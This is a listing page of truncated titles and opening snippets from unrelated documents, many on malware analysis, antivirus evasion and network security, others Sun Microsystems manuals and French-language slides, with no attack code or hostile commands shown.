Binary Code Extraction and Interface Identification for Security Applications Binary Code Extraction and Interface Identification for Security Applications Juan Caballero Noah M. Johnson Stephen McCamant Dawn Song UC Berkeley Carnegie Mellon University Abstract Binary code reuse

More information

Guidance Regarding Skype and Other P2P VoIP Solutions

Guidance Regarding Skype and Other P2P VoIP Solutions Guidance Regarding Skype and Other P2P VoIP Solutions Ver. 1.1 June 2012 Guidance Regarding Skype and Other P2P VoIP Solutions Scope This paper relates to the use of peer-to-peer (P2P) VoIP protocols,

More information

Harnessing Intelligence from Malware Repositories

Harnessing Intelligence from Malware Repositories Harnessing Intelligence from Malware Repositories Arun Lakhotia and Vivek Notani Software Research Lab University of Louisiana at Lafayette arun@louisiana.edu, vxn4849@louisiana.edu 7/22/2015 (C) 2015

More information

Covert Channels inside DNS

Covert Channels inside DNS Covert Channels inside DNS Lucas Nussbaum Lucas Nussbaum Covert Channels inside DNS 1 / 23 Introduction On many networks, to access the Internet: you have to pay (airports, train stations, hotels) or you

More information

LASTLINE WHITEPAPER. Why Anti-Virus Solutions Based on Static Signatures Are Easy to Evade

LASTLINE WHITEPAPER. Why Anti-Virus Solutions Based on Static Signatures Are Easy to Evade LASTLINE WHITEPAPER Why Anti-Virus Solutions Based on Static Signatures Are Easy to Evade Abstract Malicious code is an increasingly important problem that threatens the security of computer systems. The

More information

Self Protection Techniques in Malware

Self Protection Techniques in Malware DSIE 10 5 th Doctoral lsymposium on Informatics Engineering i January 28 29, 2010 Porto, Portugal Self Protection Techniques in Malware Tiago Santos Overview Introduction Malware Types Why Self Protection?

More information

Linux A multi-purpose executive support for civil avionics applications?

Linux A multi-purpose executive support for civil avionics applications? August 2004 Serge GOIFFON Pierre GAUFILLET AIRBUS France Linux A multi-purpose executive support for civil avionics applications? Civil avionics software context Main characteristics Required dependability

More information

Reconstruction d un modèle géométrique à partir d un maillage 3D issu d un scanner surfacique

Reconstruction d un modèle géométrique à partir d un maillage 3D issu d un scanner surfacique Reconstruction d un modèle géométrique à partir d un maillage 3D issu d un scanner surfacique Silvère Gauthier R. Bénière, W. Puech, G. Pouessel, G. Subsol LIRMM, CNRS, Université Montpellier, France C4W,

More information

Streamlined Malware Incident Response with EnCase

Streamlined Malware Incident Response with EnCase Streamlined Malware Incident Response www.encase.com/ceic C:\>whoami Joseph R. Salazar Information Technology since 1995 Information Security since 1997 Major (retired, USAR) with 22 years as a Counterintelligence

More information

SunFDDI 6.0 on the Sun Enterprise 10000 Server

SunFDDI 6.0 on the Sun Enterprise 10000 Server SunFDDI 6.0 on the Sun Enterprise 10000 Server Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 USA 650 960-1300 Fax 650 969-9131 Part No.: 806-3610-11 November 1999, Revision A Send

More information

Introduction. GEAL Bibliothèque Java pour écrire des algorithmes évolutionnaires. Objectifs. Simplicité Evolution et coévolution Parallélisme

Introduction. GEAL Bibliothèque Java pour écrire des algorithmes évolutionnaires. Objectifs. Simplicité Evolution et coévolution Parallélisme GEAL 1.2 Generic Evolutionary Algorithm Library http://dpt-info.u-strasbg.fr/~blansche/fr/geal.html 1 /38 Introduction GEAL Bibliothèque Java pour écrire des algorithmes évolutionnaires Objectifs Généricité

More information

The Need For Speed. leads to PostgreSQL. Dimitri Fontaine dimitri@2ndquadrant.fr. 28 Mars 2013

The Need For Speed. leads to PostgreSQL. Dimitri Fontaine dimitri@2ndquadrant.fr. 28 Mars 2013 The Need For Speed leads to PostgreSQL Dimitri Fontaine dimitri@2ndquadrant.fr 28 Mars 2013 Dimitri Fontaine dimitri@2ndquadrant.fr The Need For Speed 28 Mars 2013 1 / 23 Dimitri Fontaine 2ndQuadrant France

More information

Sun Cluster 2.2 7/00 Data Services Update: Apache Web Server

Sun Cluster 2.2 7/00 Data Services Update: Apache Web Server Sun Cluster 2.2 7/00 Data Services Update: Apache Web Server Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 U.S.A. 650-960-1300 Part No. 806-6121 July 2000, Revision A Copyright 2000

More information

1949 Self-reproducing cellular automata. 1959 Core Wars

1949 Self-reproducing cellular automata. 1959 Core Wars 114 Virus timeline When did viruses, Trojans and worms begin to pose a threat? Most histories of viruses start with the Brain virus, written in 1986. That was just the first virus for a Microsoft PC, though.

More information

-Duplication of Time-Varying Graphs

-Duplication of Time-Varying Graphs -Duplication of Time-Varying Graphs François Queyroi Sorbonne Universités, UPMC Univ Paris 06, UMR 7606, LIP6, F-75005, Paris CNRS, UMR 7606, LIP6, F-75005, Paris, France francois.queyroi@lip6.fr ABSTRACT.

More information

Welcome To The L.R.F.H.S. Computer Group Wednesday 27 th November 2013

Welcome To The L.R.F.H.S. Computer Group Wednesday 27 th November 2013 Welcome To The L.R.F.H.S. Computer Group Wednesday 27 th November 2013 BACKUP SECURITY AND THE CLOUD BACK UP ALWAYS BACK UP TO AN EXTERNAL DEVICE OR REMOVAL MEDIA- NEVER DIRECTLY ON TO YOUR COMPUTER IF

More information

Personnalisez votre intérieur avec les revêtements imprimés ALYOS design

Personnalisez votre intérieur avec les revêtements imprimés ALYOS design Plafond tendu à froid ALYOS technology ALYOS technology vous propose un ensemble de solutions techniques pour vos intérieurs. Spécialiste dans le domaine du plafond tendu, nous avons conçu et développé

More information

Properties of Stabilizing Computations

Properties of Stabilizing Computations Theory and Applications of Mathematics & Computer Science 5 (1) (2015) 71 93 Properties of Stabilizing Computations Mark Burgin a a University of California, Los Angeles 405 Hilgard Ave. Los Angeles, CA

More information

EPREUVE D EXPRESSION ORALE. SAVOIR et SAVOIR-FAIRE

EPREUVE D EXPRESSION ORALE. SAVOIR et SAVOIR-FAIRE EPREUVE D EXPRESSION ORALE SAVOIR et SAVOIR-FAIRE Pour présenter la notion -The notion I m going to deal with is The idea of progress / Myths and heroes Places and exchanges / Seats and forms of powers

More information

PROACTIVE PROTECTION MADE EASY

PROACTIVE PROTECTION MADE EASY PROACTIVE PROTECTION AUTHOR: ANDREW NIKISHIN KASPERSKY LAB Heuristic Analyzer Policy-Based Security Intrusion Prevention System (IPS) Protection against Buffer Overruns Behaviour Blockers Different Approaches

More information

Optimizing Solaris Resources Through Load Balancing

Optimizing Solaris Resources Through Load Balancing Optimizing Solaris Resources Through Load Balancing By Tom Bialaski - Enterprise Engineering Sun BluePrints Online - June 1999 http://www.sun.com/blueprints Sun Microsystems, Inc. 901 San Antonio Road

More information

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform

More information

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006 CSE331: Introduction to Networks and Security Lecture 17 Fall 2006 Announcements Project 2 is due next Weds. Homework 2 has been assigned: It's due on Monday, November 6th. CSE331 Fall 2004 2 Summary:

More information

Sun Management Center 3.6 Version 5 Add-On Software Release Notes

Sun Management Center 3.6 Version 5 Add-On Software Release Notes Sun Management Center 3.6 Version 5 Add-On Software Release Notes For Sun Fire, Sun Blade, Netra, and Sun Ultra Systems Sun Microsystems, Inc. www.sun.com Part No. 819-7977-10 October 2006, Revision A

More information

F-Secure Internet Security 2014 Data Transfer Declaration

F-Secure Internet Security 2014 Data Transfer Declaration F-Secure Internet Security 2014 Data Transfer Declaration The product s impact on privacy and bandwidth usage F-Secure Corporation April 15 th 2014 Table of Contents Version history... 3 Abstract... 3

More information

Machine de Soufflage defibre

Machine de Soufflage defibre Machine de Soufflage CABLE-JET Tube: 25 à 63 mm Câble Fibre Optique: 6 à 32 mm Description générale: La machine de soufflage parfois connu sous le nom de «câble jet», comprend une chambre d air pressurisé

More information

Fine-grained covert debugging using hypervisors and analysis via visualization

Fine-grained covert debugging using hypervisors and analysis via visualization Reverse Engineering by Crayon: Game Changing Hypervisor and Visualization Analysis Fine-grained covert debugging using hypervisors and analysis via visualization Daniel A. Quist Lorie M. Liebrock Offensive

More information

From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?

From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians? From Georgia, with Love Win32/Georbot Is someone trying to spy on Georgians? At the beginning of the year, a curious piece of malware came to our attention. An analyst in our virus laboratory noticed that

More information

Networks and Security Lab. Network Forensics

Networks and Security Lab. Network Forensics Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite

More information

Office of the Auditor General / Bureau du vérificateur général FOLLOW-UP TO THE 2010 AUDIT OF COMPRESSED WORK WEEK AGREEMENTS 2012 SUIVI DE LA

Office of the Auditor General / Bureau du vérificateur général FOLLOW-UP TO THE 2010 AUDIT OF COMPRESSED WORK WEEK AGREEMENTS 2012 SUIVI DE LA Office of the Auditor General / Bureau du vérificateur général FOLLOW-UP TO THE 2010 AUDIT OF COMPRESSED WORK WEEK AGREEMENTS 2012 SUIVI DE LA VÉRIFICATION DES ENTENTES DE SEMAINE DE TRAVAIL COMPRIMÉE

More information

Malware. Prof. Tom Austin San José State University Spring 2014

Malware. Prof. Tom Austin San José State University Spring 2014 Malware Prof. Tom Austin San José State University Spring 2014 Or: The Cat & Mouse Game Attackers and Defenders Play 1971 "I'M THE CREEPER : "I'M THE CREEPER : CATCH ME IF YOU CAN." CATCH ME IF YOU CAN."

More information

Computer Security DD2395

Computer Security DD2395 Computer Security DD2395 http://www.csc.kth.se/utbildning/kth/kurser/dd2395/dasakh11/ Fall 2011 Sonja Buchegger buc@kth.se Lecture 7 Malicious Software DD2395 Sonja Buchegger 1 Course Admin Lab 2: - prepare

More information

Veritas Storage Foundation 5.0 Software for SPARC

Veritas Storage Foundation 5.0 Software for SPARC Veritas Storage Foundation 5.0 Software for SPARC Release Note Supplement Sun Microsystems, Inc. www.sun.com Part No. 819-7074-10 July 2006 Submit comments about this document at: http://www.sun.com/hwdocs/feedback

More information

Sun StorEdge RAID Manager 6.2.21 Release Notes

Sun StorEdge RAID Manager 6.2.21 Release Notes Sun StorEdge RAID Manager 6.2.21 Release Notes formicrosoftwindowsnt Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 USA 650 960-1300 Fax 650 969-9131 Part No. 805-6890-11 November

More information

Archived Content. Contenu archivé

Archived Content. Contenu archivé ARCHIVED - Archiving Content ARCHIVÉE - Contenu archivé Archived Content Contenu archivé Information identified as archived is provided for reference, research or recordkeeping purposes. It is not subject

More information

Upgrading the Solaris PC NetLink Software

Upgrading the Solaris PC NetLink Software Upgrading the Solaris PC NetLink Software By Don DeVitt - Enterprise Engineering Sun BluePrints OnLine - January 2000 http://www.sun.com/blueprints Sun Microsystems, Inc. 901 San Antonio Road Palo Alto,

More information

Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma. DNS The Domain Name System

Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma. DNS The Domain Name System Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma DNS The Domain Name System RFC 1034 Network Working Group P. Mockapetris Request for Comments: 1034 ISI Obsoletes: RFCs 882, 883, 973 November

More information

Multifaceted Approach to Understanding the Botnet Phenomenon

Multifaceted Approach to Understanding the Botnet Phenomenon Multifaceted Approach to Understanding the Botnet Phenomenon Christos P. Margiolas University of Crete A brief presentation for the paper: Multifaceted Approach to Understanding the Botnet Phenomenon Basic

More information

Service Level Definitions and Interactions

Service Level Definitions and Interactions Service Level Definitions and Interactions By Adrian Cockcroft - Enterprise Engineering Sun BluePrints OnLine - April 1999 http://www.sun.com/blueprints Sun Microsystems, Inc. 901 San Antonio Road Palo

More information

Custom Penetration Testing

Custom Penetration Testing Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools

More information

TP : Configuration de routeurs CISCO

TP : Configuration de routeurs CISCO TP : Configuration de routeurs CISCO Sovanna Tan Novembre 2010 révision décembre 2012 1/19 Sovanna Tan TP : Routeurs CISCO Plan 1 Présentation du routeur Cisco 1841 2 Le système d exploitation /19 Sovanna

More information

OutbreakShield Effective and Immediate Protection against Email Virus Outbreaks

OutbreakShield Effective and Immediate Protection against Email Virus Outbreaks OutbreakShield Effective and Immediate Protection against Email Virus Outbreaks Ralf Benzmüller G DATA Software AG Introduction The virus protection provided by all current antivirus software products

More information

CORPORATE AV / EPP COMPARATIVE ANALYSIS

CORPORATE AV / EPP COMPARATIVE ANALYSIS CORPORATE AV / EPP COMPARATIVE ANALYSIS Exploit Evasion Defenses 2013 Randy Abrams, Dipti Ghimire, Joshua Smith Tested Vendors AVG, ESET, F- Secure, Kaspersky, McAfee, Microsoft, Norman, Panda, Sophos,

More information

Data Structure Reverse Engineering

Data Structure Reverse Engineering Data Structure Reverse Engineering Digging for Data Structures Polymorphic Software with DSLR Scott Hand October 28 th, 2011 Outline 1 Digging for Data Structures Motivations Introduction Laika Details

More information

Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison

Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison CEHv8 vs CEHv7 CEHv7 CEHv8 19 Modules 20 Modules 90 Labs 110 Labs 1700 Slides 1770 Slides Updated information as per the latest developments with a proper flow Classroom friendly with diagrammatic representation

More information

1-20020138637 26-sept-2002 Computer architecture and software cells for broadband networks Va avec 6526491

1-20020138637 26-sept-2002 Computer architecture and software cells for broadband networks Va avec 6526491 Les brevets CELL 14 décembre 2006 1 ARCHITECTURE GENERALE 1-20020138637 26-sept-2002 Computer architecture and software cells for broadband networks 6526491 2-6526491 25-févr-03 Memory protection system

More information

Sun TM SNMP Management Agent Release Notes, Version 1.6

Sun TM SNMP Management Agent Release Notes, Version 1.6 Sun TM SNMP Management Agent Release Notes, Version 1.6 Sun Microsystems, Inc. www.sun.com Part No. 820-5966-12 December 2008, Revision A Submit comments about this document by clicking the Feedback[+]

More information

Archived Content. Contenu archivé

Archived Content. Contenu archivé ARCHIVED - Archiving Content ARCHIVÉE - Contenu archivé Archived Content Contenu archivé Information identified as archived is provided for reference, research or recordkeeping purposes. It is not subject

More information

16-Port Gigabit Green Switch (TEG-S16Dg) 24-Port Gigabit Green Switch (TEG-S24Dg)

16-Port Gigabit Green Switch (TEG-S16Dg) 24-Port Gigabit Green Switch (TEG-S24Dg) 16-Port Gigabit Green Switch (TEG-S16Dg) 24-Port Gigabit Green Switch (TEG-S24Dg) ŸGuide d'installation rapide (1) ŸTechnical Specifications (3) ŸTroubleshooting (4) 1.02 1. Avant de commencer Contenu

More information

Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code

Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code Introduction Application Security Tom Chothia Computer Security, Lecture 16 Compiled code is really just data which can be edit and inspected. By examining low level code protections can be removed and

More information

Attacking Obfuscated Code with IDA Pro. Chris Eagle

Attacking Obfuscated Code with IDA Pro. Chris Eagle Attacking Obfuscated Code with IDA Pro Chris Eagle Outline Introduction Operation Demos Summary 2 First Order Of Business MOVE UP AND IN! There is plenty of room up front I can't increase the font size

More information

AIRBUS VHT Framework - Mascot-NuM presentation - Emmanuelle Garcia

AIRBUS VHT Framework - Mascot-NuM presentation - Emmanuelle Garcia AIRBUS Virtual Hybrid Testing Framework: focus on V&V concerns Dr. Emmanuelle Garcia, Airbus Toulouse, EZMM, strategy, process, methods and tools, simulation projects GdR Mascot-NuM workshop on Model V&V,

More information

Obfuscation: know your enemy

Obfuscation: know your enemy Obfuscation: know your enemy Ninon EYROLLES neyrolles@quarkslab.com Serge GUELTON sguelton@quarkslab.com Prelude Prelude Plan 1 Introduction What is obfuscation? 2 Control flow obfuscation 3 Data flow

More information

CS 356 Lecture 9 Malicious Code. Spring 2013

CS 356 Lecture 9 Malicious Code. Spring 2013 CS 356 Lecture 9 Malicious Code Spring 2013 Review Chapter 1: Basic Concepts and Terminology Integrity, Confidentiality, Availability, Authentication, and Accountability Types of threats: active vs. passive,

More information

Loophole+ with Ethical Hacking and Penetration Testing

Loophole+ with Ethical Hacking and Penetration Testing Loophole+ with Ethical Hacking and Penetration Testing Duration Lecture and Demonstration: 15 Hours Security Challenge: 01 Hours Introduction Security can't be guaranteed. As Clint Eastwood once said,

More information

Trends in Malware DRAFT OUTLINE. Wednesday, October 10, 12

Trends in Malware DRAFT OUTLINE. Wednesday, October 10, 12 Trends in Malware DRAFT OUTLINE Presentation Synopsis Security is often a game of cat and mouse as security professionals and attackers each vie to stay one step ahead of the other. In this race for dominance,

More information

Effective and Efficient Malware Detection at the End Host

Effective and Efficient Malware Detection at the End Host Effective and Efficient Malware Detection at the End Host Clemens Kolbitsch, Paolo Milani Comparetti, Christopher Kruegel, Engin Kirda, Xiaoyong Zhou, and XiaoFeng Wang Secure Systems Lab, TU Vienna {ck,pmilani}@seclab.tuwien.ac.at

More information

Les fragments. Programmation Mobile Android Master CCI. Une application avec deux fragments. Premier layout : le formulaire

Les fragments. Programmation Mobile Android Master CCI. Une application avec deux fragments. Premier layout : le formulaire Programmation Mobile Android Master CCI Bertrand Estellon Aix-Marseille Université March 23, 2015 Bertrand Estellon (AMU) Android Master CCI March 23, 2015 1 / 266 Les fragments Un fragment : représente

More information

OS Security. Malware. Radboud University Nijmegen, The Netherlands. Winter 2014/2015

OS Security. Malware. Radboud University Nijmegen, The Netherlands. Winter 2014/2015 OS Security Malware Radboud University Nijmegen, The Netherlands Winter 2014/2015 Last week... OS Security Malware 2 A short recap Important concept to reduce covert channels and possible damage by an

More information

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site Projet antimalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter malekal's site site entraide informatique Rechercher... Rechercher Articles/Papiers Projet antimalwares Comparatif Antivirus

More information

(IALC, Chapters 8 and 9) Introduction to Turing s life, Turing machines, universal machines, unsolvable problems.

(IALC, Chapters 8 and 9) Introduction to Turing s life, Turing machines, universal machines, unsolvable problems. 3130CIT: Theory of Computation Turing machines and undecidability (IALC, Chapters 8 and 9) Introduction to Turing s life, Turing machines, universal machines, unsolvable problems. An undecidable problem

More information

Sun Management Center 3.5 Update 1b Release Notes

Sun Management Center 3.5 Update 1b Release Notes Sun Management Center 3.5 Update 1b Release Notes Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. Part No: 819 3054 10 June 2005 Copyright 2005 Sun Microsystems, Inc. 4150 Network

More information

Malicious Software. Ola Flygt Växjö University, Sweden http://w3.msi.vxu.se/users/ofl/ Ola.Flygt@vxu.se +46 470 70 86 49. Viruses and Related Threats

Malicious Software. Ola Flygt Växjö University, Sweden http://w3.msi.vxu.se/users/ofl/ Ola.Flygt@vxu.se +46 470 70 86 49. Viruses and Related Threats Malicious Software Ola Flygt Växjö University, Sweden http://w3.msi.vxu.se/users/ofl/ Ola.Flygt@vxu.se +46 470 70 86 49 1 Outline Viruses and Related Threats Malicious Programs The Nature of Viruses Antivirus

More information

Malicious Programs. CEN 448 Security and Internet Protocols Chapter 19 Malicious Software

Malicious Programs. CEN 448 Security and Internet Protocols Chapter 19 Malicious Software CEN 448 Security and Internet Protocols Chapter 19 Malicious Software Dr. Mostafa Hassan Dahshan Computer Engineering Department College of Computer and Information Sciences King Saud University mdahshan@ccis.ksu.edu.sa

More information

VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION

VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION Kleissner & Associates Botconf 14, 3-5 Dec 2014, Nancy/France Worlds largest botnet monitoring system Since September 2012 Originally

More information

Informatique Fondamentale IMA S8

Informatique Fondamentale IMA S8 Informatique Fondamentale IMA S8 Cours 1 - Intro + schedule + finite state machines Laure Gonnord http://laure.gonnord.org/pro/teaching/ Laure.Gonnord@polytech-lille.fr Université Lille 1 - Polytech Lille

More information

Sun StorEdge N8400 Filer Release Notes

Sun StorEdge N8400 Filer Release Notes Sun StorEdge N8400 Filer Release Notes Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303 U.S.A. 650-960-1300 Part No. 806-6888-10 February 2001, Revision A Send comments about this document

More information